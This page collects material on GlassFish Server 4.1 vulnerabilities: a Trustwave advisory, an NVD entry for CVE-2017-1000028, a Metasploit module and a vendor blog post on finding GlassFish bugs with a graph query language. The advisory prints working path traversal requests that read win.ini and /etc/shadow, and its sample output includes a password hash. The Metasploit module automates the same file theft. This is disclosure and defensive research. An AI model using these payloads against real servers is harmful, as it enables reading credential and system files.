Glassfish server open source edition 4.1 1 vulnerabilities

CVEdetails.com the ultimate security vulnerability data source

(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)

Use of this information constitutes acceptance for use in an AS IS condition.There are NO warranties, implied or otherwise, with regard to this information or its use.Any use of this information is at the user’s risk.It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content.EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site.ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT,INDIRECT or any other kind of loss.

Trustwave SpiderLabs Security Advisory TWSL2015-016: Path Traversal in Oracle GlassFish Server Open Source Edition Published: 08/27/2015 Version: 1.0 Vendor: Oracle Corporation (Project sponsored by Oracle) Product: GlassFish Server Open Source Edition Version affected: 4.1 and prior versions Product description: Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering. The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to a directory traversal vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server being authenticated. Finding 1: Directory traversal Credit: Piotr Karolak of Trustwave's SpiderLabs #Proof of Concept on Microsoft Windows installation The authenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass, %C0%2F instead of (/),URL encoding. Example: REQUEST ======== GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini GET /theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini Cookie: JSESSIONID=5c47a3575077b014449e17877a0c Accept-Language: en-US Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://a.b.c.d:4848/ Host: a.b.c.d:4848 RESPONSE ======== HTTP/1.1 200 OK Server: GlassFish Server Open Source Edition 4.1 X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.8) Last-Modified: Mon, 12 Jan 2015 10:00:00 GMT Transfer-Encoding: chunked ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMC=1 MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo The response contains the contents of the "win.ini" file, proving that the server allows remote users to download the contents of system files. #Proof of Concept on Linux installation Example: REQUEST ======= GET /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow/ GET /theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow HTTP/1.1 Host: a.b.c.d:4848 Accept: */* Accept-Language: en Connection: close RESPONSE ======== HTTP/1.1 200 OK Server: GlassFish Server Open Source Edition 4.1 X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.7) Last-Modified: Tue, 13 Jan 2015 10:00:00 GMT Date: Tue, 10 Jan 2015 10:00:00 GMT Connection: close Content-Length: 1087 root:!:16436:0:99999:7::: daemon:*:16273:0:99999:7::: bin:*:16273:0:99999:7::: sys:*:16273:0:99999:7::: sync:*:16273:0:99999:7::: TRUNCATED lightdm:*:16273:0:99999:7::: colord:*:16273:0:99999:7::: hplip:*:16273:0:99999:7::: pulse:*:16273:0:99999:7::: test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7::: smmta:*:16436:0:99999:7::: smmsp:*:16436:0:99999:7::: mysql:!:16436:0:99999:7::: Vendor Response: "We plan to fix this issue in the next major GlassFish Server Open Source Edition release." Remediation Steps: No fix is available at this time for the GlassFish Server Open Source Edition release. However, this vulnerability can be mitigated with the use of technologies, such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Please note that Oracle GlassFish Server 3.x which is the current commercial release of GlassFish is not affected. Revision History: 01/12/2015 - Vulnerability disclosed to vendor 02/18/2015 - Notified vendor about the updates to TW security policy 05/19/2015 - Ninety-day deadline exceeded 07/14/2015 - Requested status from vendor 07/31/2015 - Requested status from vendor 08/21/2015 - Notified vendor about public disclosure 08/27/2015 - Advisory published References 1. https://www.owasp.org/index.php/Path_Traversal 2. https://glassfish.java.net/ 3. http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 

CVE-2017-1000028

Detail

Current Description

Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.

View Analysis Description

Analysis Description

Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.

Severity

CVSS 3.x Severity and Metrics:
NIST CVSS score

NIST: 

NVD

Base Score: 7.5 HIGH

Vector: 

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 2.0 Severity and Metrics:

National Institute of Standards and Technology

NIST: 

NVD

Base Score: 5.0 MEDIUM

Vector: 

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Weakness Enumeration

CWE-ID CWE Name Source CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) cwe source acceptance level

NIST  

Known Affected Software Configurations Switch to CPE 2.2

CPEs loading, please wait.

Denotes Vulnerable Software
Are we missing a CPE here? Please let us know.

Change History

4 change records found show changes

Modified Analysis by NIST

5/03/2019 2:27:52 PM

Action Type Old Value New Value Changed Reference Type

https://www.exploit-db.com/exploits/45196/ No Types Assigned
https://www.exploit-db.com/exploits/45196/ Exploit, Third Party Advisory, VDB Entry

Changed Reference Type

https://www.exploit-db.com/exploits/45198/ No Types Assigned
https://www.exploit-db.com/exploits/45198/ Exploit, Third Party Advisory, VDB Entry

Changed Reference Type

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Mailing List, Third Party Advisory
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Exploit, Mailing List, Third Party Advisory

CVE Modified by MITRE

8/17/2018 6:29:01 AM

Action Type Old Value New Value Added Reference

https://www.exploit-db.com/exploits/45198/ [No Types Assigned]

CVE Modified by MITRE

8/16/2018 6:29:00 AM

Action Type Old Value New Value Added Reference

https://www.exploit-db.com/exploits/45196/ [No Types Assigned]

Initial Analysis by NIST

7/21/2017 11:50:13 AM

Action Type Old Value New Value Added CPE Configuration

OR *cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*

Added CVSS V2

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Added CVSS V3

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Added CWE

CWE-22

Changed Reference Type

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 No Types Assigned
https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Mailing List, Third Party Advisory

Quick Info

CVE Dictionary Entry:
CVE-2017-1000028
NVD Published Date:

07/17/2017

NVD Last Modified:

05/03/2019

Source:

MITRE

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition', 'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability which exits in administration console of Oracle GlassFish Server 4.1, which is listening by default on port 4848/TCP. }, 'References' => [ ['CVE', '2017-1000028'], ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'], ['EDB', '39441'] ], 'Author' => [ 'Trustwave SpiderLabs', # Vulnerability discovery 'Dhiraj Mishra' # Metasploit module ], 'DisclosureDate' => 'Aug 08 2015', 'License' => MSF_LICENSE )) register_options( [ Opt::RPORT(4848), OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']), OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ]) ]) end def run_host(ip) filename = datastore['FILEPATH'] traversal = "%c0%af.." * datastore['DEPTH'] << filename res = send_request_raw({ 'method' => 'GET', 'uri' => "/theme/META-INF/prototype#{traversal}" }) unless res && res.code == 200 print_error('Nothing was downloaded') return end vprint_good("#{peer} - #{res.body}") path = store_loot( 'oracle.traversal', 'text/plain', ip, res.body, filename ) print_good("File saved in: #{path}") end end 

CVEdetails.com the ultimate security vulnerability data source

(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)

Use of this information constitutes acceptance for use in an AS IS condition.There are NO warranties, implied or otherwise, with regard to this information or its use.Any use of this information is at the user’s risk.It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content.EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site.ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT,INDIRECT or any other kind of loss.

We have long had a thesis that when free open-source software projects are forked into commercial versions, then the free open-source version no longer gets the same subsequent level of security updates as the commercial version. Phrased into a question, are the free versions of open-source core products left out in the cold? Earlier this year we were asked by a customer if we could apply our knowledge of open-source security to look at GlassFish Server, a reference implementation for Java EE. Specifically they wanted to know if there were vulnerabilities present in the free GlassFish Open Source Edition that had been patched in the commercial version.

In this post, we disclose vulnerabilities in the open-source version of GlassFish that we discovered using our domain specific language for identifying vulnerabilities, the Security Graph Language (SGL). These issues were all reported to Oracle on 03 May 2017. We worked through a responsible coordinated disclosure process with them and they have published updates protecting users earlier today. Through our disclosure, 4 new Common Vulnerabilities and Exploits (CVEs) for the Oracle GlassFish Server were credited to us.

GlassFish

GlassFish was first released in 2005 by Sun Microsystems. In 2010, Oracle bought Sun Microsystems and committed to a roadmap which included a commercial version called Oracle Glassfish Server. In 2010, commercial support for the Oracle GlassFish Server was discontinued and replaced by the Oracle WebLogic Server. While commercial support was discontinued, security fixes continue to be released in the Oracle Critical Patch Update (CPU) process for users of the commercial product. Aside from the Oracle GlassFish Server, the other version of GlassFish is known as the GlassFish Open Source Edition which is the open-source Java EE Reference Implementation.

Security Graph Language (SGL)

The Security Graph Language (SGL) is the industry’s first Domain Specific Language (DSL) designed to identify security issues in open-source code. With SGL, we put the world’s open-source into a graph database and are then able to traverse the graph of software dependencies for any given project.

To provide an illustration, below is an example of finding the Java libraries which could be vulnerable to External Entity Expansion (XXE) attack(s).

let xml_new = 

method

(class_name: within(

'javax/xml/parsers/DocumentBuilderFactory'

,

'javax/xml/stream/XMLInputFactory'

)

,

method_name

:

within(

'newInstance'

,

'newFactory'

))

in

let xml_set_feature =

method

(class_name:

'javax/xml/parsers/DocumentBuilderFactory'

, method_name:

'setFeature'

)

in

let

xml_set_property

=

method

(class_name:

'javax/xml/stream/XMLInputFactory'

, method_name:

'setProperty'

)

in

let

results

=

xml_new

called_by

not

(

union

(calls xml_set_feature, xml_set_property)

)

in

results

#

Example

of

a

XXE

pattern

formed

to

find

similar

XXE

bugs

SGL empowers us with super-powers to express a security pattern and enumerate the entire graph of libraries with ease.

Issues discovered in open-source GlassFish Server

We found a total of 23 issues in the open-source GlassFish server. Of those 23 issues, 10 fixed by Oracle, while 13 were not fixed as the GlassFish versions affected are no longer being maintained.

Out of the 10 issues that were fixed issues, 7 had no previous CVE, and all of them affected the latest version of the GlassFish Open Source Edition at the time of discovery.

Disclosure Timeline

4 April 2017 – Discovered 21 direct issues in GlassFish
3 May 2017 – Contacted maintainer
4 May 2017 – Maintainer responded
4 May 2017 – Provided Information to the maintainer
6 May 2017 – Tracking number received
2 June 2017 – Contacted maintainer to follow up with our 30-day disclosure policy
7 June 2017 – Maintainer requested an extension
22 June 2017 – Maintainer seek clarification on some issues
22 June 2017 – Provided clarification to maintainer
28 June 2017 – Provided more information to maintainer
13 July 2017 – Seek for updates from maintainer
14 July 2017 – Maintainer requested an extension
26 August 2017 – Maintainer provided granular tracking numbers for individual issue
8 September 2017 – Maintainer published GlassFish Open Source Edition 5.0
27 September 2017 – Seek for updates from maintainer
28 September 2017 – Maintainer asked for an extension till 17 October 2017
17 October 2017 – Maintainer releases October CPU 2017
17 October 2017 – Published details on the issues

The remainder of this post will contain information on all 23 disclosed direct issues.

Summary of Issues

The table below provides an overview of the 10 issues that were fixed through our disclosure.

CVE /
NON CVEIssue Summary3.x
(Maven)3.0.1.x
(Oracle)3.1.2.x
(Oracle)4.0.x,
4.1.x
(Maven)5.0
(Maven)Non CVE 1Information Disclosure via MessageFormat parametersN.A.N.A.N.A.✖✓Non CVE 2Cross-Site Scripting (XSS) via configNameSection✖N.A.✓✖✓Non CVE 3Deserialization flaw✖✓✓✖✓Non CVE 4Denial of Service (DoS) via file upload requests✖N.A.N.A.✖✓Non CVE 5Handle Proxy Header (HTTPoxy) in CGISERVLET✖✓✓✖✓Non CVE 6Deprecated SSLv3 enabled by default✖N.A.N.A.✖✓Non CVE 7Security Manager Bypass✖✓✓✖✓CVE-2016-3607Remote Code Execution (RCE) via NULL byte injection✖N.A.N.A.✖✓CVE-2016-3608Directory Traversal via unicode encoding payload✖N.A.N.A.✖✓CVE-2016-5477Directory Traversal via unicode encoding payload✖N.A.N.A.✖✓

The remaining 13 issues were not fixed in the Open Source Edition as it affects versions which are no longer maintained.

CVE /
NON CVEIssue Summary3.0.x
(Maven)3.1.x
(Maven)3.2.x
(Maven)Non CVE 8,
Not fixedInformation Disclosure via error messageN.A.✖✖Non CVE 9,
Not fixedInformation Disclosure via server.logN.A.✖✖CVE-2011-0807Remote Code Execution (RCE) via default admin account✖✖✖CVE-2011-1511Information Disclosure via TRACE requests✖✖N.A.CVE-2011-3559Denial of Service (DoS) via range header✖✖✖CVE-2011-5035Denial of Service (DoS) via hash table collisions✖✖✖CVE-2012-0081Unauthorized creation of Domain via admin-cli✖✖N.A.CVE-2012-0104Denial of Service (DoS) via conversion of named encoding into Charsets✖✖✖CVE-2012-0550Cross-Site Request Forgery (CSRF) via REST component✖✖✖CVE-2012-0551Cross-Site Scripting (XSS) via administrator console✖✖✖CVE-2012-3155Denial of Service (DoS) via administrator console✖✖✖CVE-2013-1508Cross-Site Scripting (XSS) via REST component✖✖✖CVE-2013-1515Cross-Site Scripting (XSS) via administration console✖✖✖

Credited Common Vulnerabilities and Exploits (CVEs)

From the list of issues above, the following 4 CVEs were credited to us by the maintainers on the commercial version of Oracle GlassFish Server, and these were included in today’s release of the Oracle CPU October 2017.

CVEIssue SummaryNon CVE 7,
CVE-2017-10385Security Manager BypassNon CVE 3,
CVE-2017-10391Deserialization flawNon CVE 5,
CVE-2017-10393Handle Proxy Header (HTTPoxy) in CGISERVLETNon CVE 2,
CVE-2017-10400Cross-Site Scripting (XSS) via configNameSection

How we discovered these issues

We took several approaches to discover these issues.

One of our approaches was to collect several known bugs, from other application servers, and test if GlassFish contained similar bugs. As an example used SGL to enumerate a known XXE pattern over the entire call graph of the project.

Security Manager bypass

The issue of Security Manager bypass is not new, and the requirements to introduce this weakness is loose. This issue was also present in a similar application server, the Apache Tomcat. To reconstruct an existing issue like in CVE-2016-0763, we can construct an SGL query which contains the vulnerable pattern like the following:

sgl> let set_global_context = 

method

(class_name:

'org/apache/naming/factory/ResourceLinkFactory'

, method_name:

'setGlobalContext'

)

in

let

get_security_manager

=

method

(class_name:

'java/lang/System'

, method_name:

'getSecurityManager'

)

in

let

check_permission

=

method

(class_name:

'java/lang/SecurityManager'

, method_name:

'checkPermission'

)

in

set_global_context

called_by

not

(

union

(calls get_security_manager, calls check_permission)

)

method

(module_name:

'null'

, class_name:

'org/apache/catalina/core/NamingContextListener'

, method_name:

'lifecycleEvent'

, descriptor:

'(Lorg/apache/catalina/LifecycleEvent;)'

)

The query above would display all methods that calls the setGlobalContext method, and not make a call to both the getSecurityManager and checkPermission methods.

To take it a step further, we can now use the identified method to display all affected libraries by adding a single traversal step, method_in_library.

sgl

>

set_global_context

called_by

not

(union(calls get_security_manager, calls check_permission))

method_in_library

library

(

language

:

'java'

,

coord1

:

'org.glassfish.main.web'

,

coord2

:

'web-core'

,

version

:

'4.1.1'

)

library

(

language

:

'java'

,

coord1

:

'org.glassfish.main.web'

,

coord2

:

'web-core'

,

version

:

'4.0-b72'

)

library

(

language

:

'java'

,

coord1

:

'org.glassfish.main.extras'

,

coord2

:

'glassfish-embedded-all'

,

version

:

'4.1'

)

library

(

language

:

'java'

,

coord1

:

'org.glassfish.main.extras'

,

coord2

:

'glassfish-embedded-all'

,

version

:

'4.1.1'

)

library

(

language

:

'java'

,

coord1

:

'org.glassfish.main.extras'

,

coord2

:

'glassfish-embedded-all'

,

version

:

'4.1.2'

) …

The results above were subsequently verified and we catalogued the vulnerability as “Non CVE 7” in the table of listing above.

Improper Handling of File

Before Java 7 Update 40, file manipulation during Java Object Deserializable happens when handling a File object which contained a NULL byte. The following SGL query would allow us to instances of readObject defined in GlassFish, and makes a call to java/io/File’s getPath method.

sgl> let glassfish_class = 

class

(regex

'org.glassfish.*'

)

in

let read_object =

method

(method_name:

'readObject'

)

in

let

get_path

=

method

(class_name:

'java/io/File'

, method_name:

'getPath'

)

in

glassfish_class

defines

read_object

where

(calls get_path)

From the result set, we could narrow the results further by adding more known pattern of codes that would introduce a weakness to the project. We found that we could also reach glassfish_class by traversing the graph in the reverse direction.

get

_p

ath called

_

read

_

object

where(defined

_

glassfish

_

class

)

This was useful by reducing the number of traversals, and allowed us to reach the callers of a method, instead of tracing the calls. It is useful to perform static analysis of callers where a vulnerable method is already known, demonstrated by the following example.

The results from the above query was then catalogued as “CVE-2016-3607” as it was found to closely match an existing CVE for the commercial Oracle GlassFish Server.

Usage of SSLv3

SSLv3 has been deprecated by the IETF. In GlassFish, there is a method setSsl3Enabled which is set by default to true and as you can see SGL returns the versions affected.

sgl> let set_ssl3_enabled = method(

method_name:

'setSsl3Enabled'

)

in

set_ssl3_enabled called_by method_in_library ... library(

language:

'java'

,

coord1:

'org.glassfish.main.extras'

,

coord2:

'glassfish-embedded-all'

,

version:

'4.1'

) library(

language:

'java'

,

coord1:

'org.glassfish.main.extras'

,

coord2:

'glassfish-embedded-all'

,

version:

'4.1.1'

) library(

language:

'java'

,

coord1:

'org.glassfish.main.extras'

,

coord2:

'glassfish-embedded-all'

,

version:

'4.1.2'

) library(

language:

'java'

,

coord1:

'org.glassfish.main.security'

,

coord2:

'security'

,

version:

'4.1'

) library(

language:

'java'

,

coord1:

'org.glassfish.main.security'

,

coord2:

'security'

,

version:

'4.1.1'

) library(

language:

'java'

,

coord1:

'org.glassfish.security'

,

coord2:

'security'

,

version:

'3.1.1-b09'

) library(

language:

'java'

,

coord1:

'org.glassfish.security'

,

coord2:

'security'

,

version:

'3.1.1-b10'

) library(

language:

'java'

,

coord1:

'org.glassfish.main.security'

,

coord2:

'security'

,

version:

'3.1.2'

) library(

language:

'java'

,

coord1:

'org.glassfish.main.security'

,

coord2:

'security'

,

version:

'3.1.2.2'

) library(

language:

'java'

,

coord1:

'org.glassfish.common'

,

coord2:

'glassfish-mbeanserver'

,

version:

'3.1'

) library(

language:

'java'

,

coord1:

'org.glassfish.common'

,

coord2:

'glassfish-mbeanserver'

,

version:

'3.1.1'

) library(

language:

'java'

,

coord1:

'org.glassfish.common'

,

coord2:

'glassfish-mbeanserver'

,

version:

'3.1-b26'

) library(

language:

'java'

,

coord1:

'org.glassfish.common'

,

coord2:

'glassfish-mbeanserver'

,

version:

'3.1-b27'

) ...

After we have reviewed the results and confirming that the weakness exists, we have catalogued this vulnerability as “Non CVE 6”.

Denial of Service (DoS) via File Upload Requests

We then took an existing vulnerability in Apache Commons Fileupload library, CVE-2016-3092, and tried to detect all instances which contained this issue where the method did not throw an IllegalArgumentException.

sgl> let multipartstream_init = 

method

(class_name:

'org/apache/catalina/fileupload/MultipartStream'

, method_name:

'<init>'

, descriptor:

'(Ljava/io/InputStream;[BILorg/apache/catalina/fileupload/MultipartStream$ProgressNotifier;)'

)

in

let

illegal_argument_exception

=

method

(class_name:

'java/lang/IllegalArgumentException'

, method_name:

'<init>'

, descriptor:

'(Ljava/lang/String;)'

in

multipartstream_init

not

(calls illegal_argument_exception)

With the above SGL query, we found multiple leads which led us to believe that GlassFish Open Source was similarly affected. With a little further investigation, we concluded that GlassFish Open Source was vulnerable to a Denial of Service (DoS) weakness and have catalogued this vulnerability as “Non CVE 4”.

Continuous Security with the Security Graph Language

By expressing software issues into SGL queries, and continuously building up the amount of SGL queries, the Security Graph Language is an integral part of continuous security by automatically identifying issues as new software gets published.

Similarly, as new SGL queries gets expressed, the query would be ran over the entire world of open-source to collect a result set of issues. The funneled result set obtained by the SGL queries narrows the space of software to allow Security Researchers to efficiently confirm, publish, and produce new security advisories and patches.

Summary

Users of the GlassFish Open Source Edition should update to version 5.0 as soon as possible. Oracle will not be releasing patches for version 3, and will only be releasing fixes for version 4 at a later date.

SGL, together with our knowledgebase of vulnerabilities is proving very powerful to discover new issues in open-source projects.

Written by Jane